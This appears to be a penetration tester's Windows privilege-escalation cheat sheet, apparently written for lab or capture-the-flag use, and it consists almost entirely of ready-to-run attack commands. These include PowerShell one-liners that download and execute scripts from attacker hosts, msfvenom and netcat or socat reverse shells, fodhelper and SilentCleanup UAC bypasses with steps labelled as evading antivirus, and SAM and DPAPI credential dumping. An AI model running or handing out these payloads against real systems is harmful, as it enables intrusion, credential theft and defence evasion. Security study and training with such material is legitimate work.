ALL IN ONE
payloads
Powershell Downloading Files
#Download and execute at the same time
powershell.exe IEX(New-Object+Net.WebClient).downloadString('http%3a//10.10.14.10/rev.ps1')
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.41:8000/JuicyPotato.exe','C:/Users/kohsuke/Desktop/JuicyPotato.exe')"
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.14:7898/file.exe', 'file.exe')"
powershell -c '(Invoke-RestMethod -Uri "http://10.10.14.3:8000/JuicyPotato.exe" -Method Get -OutFile "jp.exe")'
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.14:7898/file.exe' -OutFile 'file.exe'"
powershell -c "$url = 'http://10.10.10.14:7898/file.exe'; $stream = [System.IO.StreamReader]::new($url); $content = $stream.ReadToEnd(); Set-Content -Path 'file.exe' -Value $content -Encoding Byte"
powershell -c "$client = New-Object Net.WebClient; $client.DownloadFile('http://10.10.10.14:7898/file.exe', 'file.exe')"
powershell -c "$url = 'http://10.10.10.14:7898/file.exe'; $request = [System.Net.HttpWebRequest]::Create($url); $response = $request.GetResponse(); $stream = $response.GetResponseStream(); $output = [System.IO.File]::Create('file.exe'); $stream.CopyTo($output); $output.Close(); $response.Close()"
Powershell references : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
Others File Transfer method
Downloading from Remote Host
certutil -urlcache -f http://YOUR_IP:PORT/filename.exe renamed.exe
copy \\10.10.14.14\share\churrasco.exe c.exe
bitsadmin /transfer myDownload /priority normal http://10.10.14.3:8000/JuicyPotato.exe jp.exe
curl -O http://10.10.15.14/example.exe
wget http://10.10.15.14/example.exe
Listeners on localhost
sudo smbserver.py share .
nc -nvlp 1234
python3 -m http.server
nc -nv TARGET_IP 1234 < received_file
nc -nlvp 1234 > file_to_send
On the receiving end running,
nc -l -p 1234 > out.file
will begin listening on port 1234.
On the sending end running,
nc -w 3 [destination] 1234 < out.file
scp example.txt user@192.168.1.100:/path/to/destination/
scp user@192.168.1.100:/path/to/file.txt /path/on/local/machine/
echo c:\Users\kohsuke\Desktop\nc.exe 10.10.14.41 4455 -e cmd.exe > reverse.batFile Permission Exploit
# 777 exe file ?
#Check if startup programs have write access
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f exe > rev.exe
# Place rev.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".
#Check if AlwaysInstallElevated” value is 1
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f msi > setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi
# "User-PC\User" has the "SERVICE_CHANGE_CONFIG" permission.
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
# "BINARY_PATH_NAME" field displays a path that is not confined between quotes
sc qc unquotedsvc
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
# Has "FullContol" permission over the registry key?
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
windows_service.c
#include <stdlib.h> // Include the necessary header file
int main() {
system("cmd.exe /k net localgroup administrators user /add"); // Use system() function to execute the command
return 0;
}
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
sc start regsvc
Metasploit Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4567 -f aspx > letmein.aspx
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Manual Windows Reverse Shell
python3 -m http.server
#to get reverse shell from your kali
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4567 -f aspx > letmein.aspx
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4567
cd C:\Windows\Temp
certutil -urlcache -f http://YOUR_IP:PORT/filename.exe renamed.exeMetasploit Windows suggester
background
use post/multi/recon/local_exploit_suggester
run SESSION=1Window Suggester
winpeas
wesng
Watson (For modern Windows 10)
Sherlock (For older Windows XP / 2003)
MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : 'mrxdav.sys' WebDAV
MS16-032 : Secondary Logon Handle
MS16-034 : Windows Kernel-Mode Drivers EoP
MS16-135 : Win32k Elevation of Privilege
CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv EscWindows System Enumeration
systeminfo
#32bit ? 64bit ? 68bit ?
wmic os get osarchitecturesysteminfo | findstr /b /c:"OS Name" /c:"OS Version" /c:"System Type"
wmic qfe
wmic qfe Caption,Description,HotFixID,InstalledOn
wmic logicaldisk
wmic logicaldisk get caption,description,providername
wmic logicaldisk get captionWindows User Enumeration
whoami
whoami /priv
whoami /groups
net user
net user jack
net localgroup
net localgroup administratorsWindows Network Enumeration
netstat -ano | findstr "LISTEN"
ipconfig
ipconfig /all
#Check Incoming / Outgoing Network Traffic
arp -a
#Check route table
route print
#Check open ports
netstat -anoWindows Password Hunting
#find 'password' in current directory with extension of txt,ini and config
findstr /si password *.txt *.ini *.config
#find 'password' in whole C: directory
dir /s C:\* | findstr /i "password"
dir /r
dir /l /a
#Common sus file places
C:\Users\Public
C:\Users\Test\AppData\Roaming
#Finding credential location
cmdkey /list
runas /usr:ACCESS\Administrator /savecred cmd /c
runas /usr:ACCESS\Administrator /savecred "cmd /c C:\Users\security\Desktop\nc.exe 10.10.14.17 4567 -e cmd.exe"Credential Extracting
reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save
reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
cd Windows/System32/config
secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM
#cache files
#Must have admin accesss
powershell -c "$client = New-Object Net.WebClient; $client.DownloadFile('http://10.10.14.17:8000/seatbelt.exe', 'sb.exe')"
sb.exe MasterKeys
sb.exe users
# cd to MasterKey file directory
cd C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001
# encode and print the masterkey
certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 output
# save it into local machine
type output
https://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/AV Enumeration
#Check Window Defender is up or down
sc query windefend
#Check running services
sc queryx type= service
#Check FireWall Status
netsh advfirewall firewall dump
netsh firewall show state
#Check FireWall configuration
netsh firewall show configBypass UAC
UAC = Prompt ask admin for confirmation yes and no
System Configuration
run "msconfig" can bypass the prompt
then launch cmd = get system
Authorization Manager
run "azman.msc"
Help -> Help Topics -> Right Click MMC -> view source
File -> open -> go find cmd.exe at C:\Windows\System32 -> right click the icon
Auto Elevate = no need prompt
Conditions:
Signed by windows publisher
Inside trusted directory like System32 , ProgramFiles
sigcheck : help identify auto-evelate on or off
fodhelper : manage window additional language and more
- no need gui can exec
When checking HKEY_CLASSES_ROOT, if there is a user-specific association at HKEY_CURRENT_USER (HKCU),
it will take priority. If no user-specific association is configured, then the system-wide association
at HKEY_LOCAL_MACHINE (HKLM) will be used instead
C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.
C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.
run fodhelper.exe
reg delete HKCU\Software\Classes\ms-settings\ /f
Windows AV detected
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f
fodhelper.exe
==================================================================================================================
Windows AV detected v2 but still can run (RACE CONDITION)
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Users\kostas\Desktop\nc.exe 10.10.14.14:4747 -e cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
(because these 2 run together)
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
====================================================================================================================
powershell detected AV
$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:10.8.17.213:4445 EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
======================================================================================================================
Translated powershell to cmd undetected BY AV
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:192.168.146.141:4556 EXEC:cmd.exe,pipes"
set CMD="powershell -windowstyle hidden C:\Users\ASUS\Downloads\nc64.exe TCP:192.168.146.141:4556 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
==============================================================
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.jack\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".jack" /f
reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f
==========================================
BYPASSING ALWAYS NOTIFIY
-Schedule Task will not prompt user
"cmd.exe /c C:\tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes &REM "
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:10.8.17.213:4446 EXEC:cmd.exe,pipes &REM " /f
reg delete "HKCU\Environment" /v "windir" /f
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:10.8.17.213:4446 EXEC:cmd.exe,pipes &REM " /f
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
reg delete "HKCU\Environment" /v "windir" /f
Read Permissions
#possible if user is also admin
icacls C:\Users\Administrator\Desktop\root.txt /grant username:F
icacls C:\Windows\System32\net.exe /grant username:username:F
"F" for Full control, "M" for Modify, "R" for Read, "W" for Write, "X" for Execute
Finding exe files
where /R c:\windows bash.exe
where /R c:\windows wsl.exeLogin methods
psexec.py administrator:'password'@MACHINE_IP
smbexec.py administrator:'password'@MACHINE_IP
wmiexec.py administrator:'password'@MACHINE_IPReferences
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
https://github.com/SecWiki/windows-kernel-exploits
Last updated
Was this helpful?